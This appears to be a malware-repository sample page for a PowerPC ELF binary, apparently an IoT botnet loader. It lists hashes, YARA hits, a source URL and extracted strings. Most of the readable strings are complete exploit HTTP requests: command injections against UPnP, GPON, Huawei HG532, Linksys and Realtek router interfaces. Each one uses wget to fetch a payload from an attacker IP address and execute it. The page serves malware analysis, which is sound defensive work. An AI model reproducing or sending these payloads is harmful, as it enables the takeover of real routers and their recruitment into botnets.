Sample details: 9e6dc9a05da76c362bd6261861b45a04

Hashes
MD5: 9e6dc9a05da76c362bd6261861b45a04
SHA1: fb9a58cd34522f5de1f5b59fcf866b45c678aeda
SHA256: a8a87c22efcd979f3af9a42ce246cc8ac51f2ff73c786cc53a88183336e95054
SSDEEP: 768:3aPNCnD2iXpQqy2nN3e3Kww8RhmGMlUykbG/v36qUGW90dMq/2syMX2EnwJwh2Qb:qPQXpq2g/iF3Krwz2EnM+2Q7f
Details
File Type: ELF
Yara Hits
YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Big_Numbers1
Source
http://212.114.57.61/vb/xxx.ppc
Strings
		}#Kx9)
xTc808c
}i[x|k
 }$KxB
 }$KxB
:}VI.}6J
U) 6|	
+d9J+h})
TjF>Ti
Tk@.U)
9#+h}i
}#Kx9)+h/
|	y.9)
xU X(U)@.})
Uk@.U@
Cx})[x8
}#Kx9)	
}[Sx8	
xT	`&T
P*} HP9J
>TjF>/
KxTi@.|
}#Kx9)
}[Sx8	
T`X(}iJx|c
|iJxTc
X(}iJx
Jx|	JxT
+d9J+h})
>TjF>/
KxTi@.|
9#+h}i
}#Kx9)+h/
$}+Kx9k
>}(Kx/
}#Kx}e[x8
+x}%KxD
QJD.QJ
}#Kx8!
}#XP9)
 }CSx}e[x
}CSx}e[x
}e[x}CSx
}+HPU)
9)09U)
}FSx}i
}iXP= 
<|	:.p	
|	:.p	
})Zx9c
 POST /UD/?9 HTTP/1.1
User-Agent: OSIRIS
Content-Type: text/xml
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>/tmp/.e && cd /tmp; >/var/dev/.e && cd /var/dev; wget http://212.114.57.611/z.sh -O - > lol.sh; chmod 777 lol.sh; sh lol.sh; rm lol.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /cdn-cgi/
 HTTP/1.1
User-Agent: 
Host: 
Cookie: 
U4POST /GponForm/diag_Form?images/ HTTP/1.1
User-Agent: Hello, World
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://212.114.57.61/kgg+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.114.58.61 -l /tmp/rk -r /vk/kgg; /bin/busybox chmod 777 * /tmp/rk; /tmp/rk huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
POST /tmUnblock.cgi HTTP/1.1
Host: 159.65.204.46:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+xxx.mpsl%3B+wget+http%3A%2F%2F159.65.204.46%2Fvb%2Fxxx.mpsl%3B+chmod+777+xxx.mpsl%3B+.%2Fxxx.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
POST /picsdesc.xml HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Hello-World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`wget http://159.65.204.46/kgg -O - > /var/xk;sh/var/xk realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
?/dev/null
.shstrtab
.rodata
.ctors
.dtors
.sdata